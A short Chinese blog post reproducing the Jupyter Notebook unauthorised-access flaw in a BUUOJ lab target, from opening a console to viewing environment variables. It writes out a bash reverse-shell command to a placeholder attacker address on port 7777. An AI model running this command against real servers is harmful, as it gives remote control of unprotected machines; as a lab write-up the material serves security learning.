Jupyter Notebook 未授权访问漏洞

这两天在做金融数据分析的时候一直在用jupyter notebook,今天碰巧看到了一个jupyter notebook的漏洞,就顺手复现了一下,水一篇=。=

0x01漏洞描述

如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。

0x02漏洞环境

用BUUOJ上的Real环境复现(感谢赵总!)

https://buuoj.cn/challenges#[Jupyter]notebook-rce

0x03漏洞复现

启动靶机后创建一个控制台

image-20201030184859262

env查看当前环境变量

image-20201030185334464

0x04反弹shell

在靶机上输入命令

bash -i >& /dev/tcp/x.x.x.x/7777 0>&1

攻击机监听7777端口

image-20201030184021679

0x05参考文章

Topic URL
Jupyter Notebook 未授权访问漏洞 https://github.com/vulhub/vulhub/tree/master/jupyter/notebook-rce
posted @ 2020-10-30 20:47  LEOGG  阅读(894)  评论(0编辑  收藏  举报